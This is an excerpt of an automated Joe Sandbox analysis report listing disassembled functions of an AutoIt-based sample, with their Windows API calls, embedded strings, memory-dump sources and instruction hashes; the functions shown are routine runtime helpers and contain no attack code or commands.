                                                                                                                                    Function 002B993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 002BB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002BB7BD
                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 002B99A6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: 025542f2623f141c88b4ea6948964390783ab51f6fcf51cc2a4a12eacd17855f
                                                                                                                                    • Instruction ID: d77ec2d36914b8ec232a99a1842e13fd8ae3ee93c7f57551e71d1d20b45c872d
                                                                                                                                    • Opcode Fuzzy Hash: 025542f2623f141c88b4ea6948964390783ab51f6fcf51cc2a4a12eacd17855f
                                                                                                                                    • Instruction Fuzzy Hash: 7A014E72A6210477CB15EBA4C902EFFB3AD9F15380F100019F985B3281DE644F38DA72
                                                                                                                                    Function 00286D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                    • String ID: @b2
                                                                                                                                    • API String ID: 3494438863-281480311
                                                                                                                                    • Opcode ID: b48795fa6c251782cd7f8d31e4dc50709fc73f4ef09a2d226ee3c9ff3d7d269a
                                                                                                                                    • Instruction ID: ea7263e6b9119d672288d2b2784cca2046b5e3da573f5f051f0ee0dd3b1f6ef5
                                                                                                                                    • Opcode Fuzzy Hash: b48795fa6c251782cd7f8d31e4dc50709fc73f4ef09a2d226ee3c9ff3d7d269a
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0627932E313CBF739AF58BC25BA13799F704720F50486AF200DA2D5EB7088924B90
                                                                                                                                    Function 002C54E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                                    • String ID: #32770
                                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                                    • Opcode ID: 709b4973cca4c57d9958f04412c4c645f31e832d186961de1b81550a84a7a90e
                                                                                                                                    • Instruction ID: 23f7f7dfc07f922c45bc0138f83232b97ba29fe9e9e4b574cba197e7b47f3d7b
                                                                                                                                    • Opcode Fuzzy Hash: 709b4973cca4c57d9958f04412c4c645f31e832d186961de1b81550a84a7a90e
                                                                                                                                    • Instruction Fuzzy Hash: D7E0613650022917D320EB59AC49FE7F7ACDB05B70F00005BFC04D3051D570E95587D0
                                                                                                                                    Function 002B8892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002B88A0
                                                                                                                                      • Part of subcall function 00283588: _doexit.LIBCMT ref: 00283592
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message_doexit
                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                    • API String ID: 1993061046-4017498283
                                                                                                                                    • Opcode ID: d53c60a52f3887fbe2992fe69f3c8047c5d807aa78677b4532b211cc7684d5c0
                                                                                                                                    • Instruction ID: 23c5769029a2c9f0ce003d7988189769ecc767bfee0783ad488f315889e1eb2f
                                                                                                                                    • Opcode Fuzzy Hash: d53c60a52f3887fbe2992fe69f3c8047c5d807aa78677b4532b211cc7684d5c0
                                                                                                                                    • Instruction Fuzzy Hash: BFD0127229635872D22576A4AC0BBDA6A4C8B09B91F004426FB08A51C349D585B18695
                                                                                                                                    Function 002A0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 002A0091
                                                                                                                                      • Part of subcall function 002DC6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,002A027A,?), ref: 002DC6E7
                                                                                                                                      • Part of subcall function 002DC6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DC6F9
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002A0289
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                    • String ID: WIN_XPe
                                                                                                                                    • API String ID: 582185067-3257408948
                                                                                                                                    • Opcode ID: 1adae3cd2609a4849918efce543613471f72cfbec86271df9106de74b3dbe9ce
                                                                                                                                    • Instruction ID: e9ffe7ab8c29c3fb2d636d352ea2d3fa052ac11b55f38ce8aeb22b6532d58529
                                                                                                                                    • Opcode Fuzzy Hash: 1adae3cd2609a4849918efce543613471f72cfbec86271df9106de74b3dbe9ce
                                                                                                                                    • Instruction Fuzzy Hash: D4F03970C2510ADFCB25DFA1D9D8BECBBB8AB18344F240095E106A2190CBB04F91CF20
                                                                                                                                    Function 00275800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyIcon.USER32(,z20z2,00327A2C,00327890,?,00275A53,00327A2C,00327A30,?,00000004), ref: 00275823
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyIcon
                                                                                                                                    • String ID: ,z20z2$SZ',z20z2
                                                                                                                                    • API String ID: 1234817797-2912463940
                                                                                                                                    • Opcode ID: eb45166fe7e30759f351b53ca86840a564e9d1f9362547fc78fe6996f9e8329c
                                                                                                                                    • Instruction ID: a1399095d1b891cf8796e5f39d0f0a773aa33f09948f3e921ced3196d7f0ab55
                                                                                                                                    • Opcode Fuzzy Hash: eb45166fe7e30759f351b53ca86840a564e9d1f9362547fc78fe6996f9e8329c
                                                                                                                                    • Instruction Fuzzy Hash: B7E0C232024217EBE7201F08D800794FBE8AF21331F74C02AE08846051D3F168F0CB91
                                                                                                                                    Function 002C9EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 002C9EB5
                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002C9ECC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                    • String ID: aut
                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                    • Opcode ID: 8b27292abad4c73e25c933afcde0845f840133e99bf155195332dfaebff32b83
                                                                                                                                    • Instruction ID: 629d0bc5254d4aeb179d8f7e2faf85ef67559ed80ef02598da662a1c0d985d86
                                                                                                                                    • Opcode Fuzzy Hash: 8b27292abad4c73e25c933afcde0845f840133e99bf155195332dfaebff32b83
                                                                                                                                    • Instruction Fuzzy Hash: 3AD05E7954030DABDB50AB94EC4EFEABB2CDB04700F0042A2BE58910A3DA705594CBA5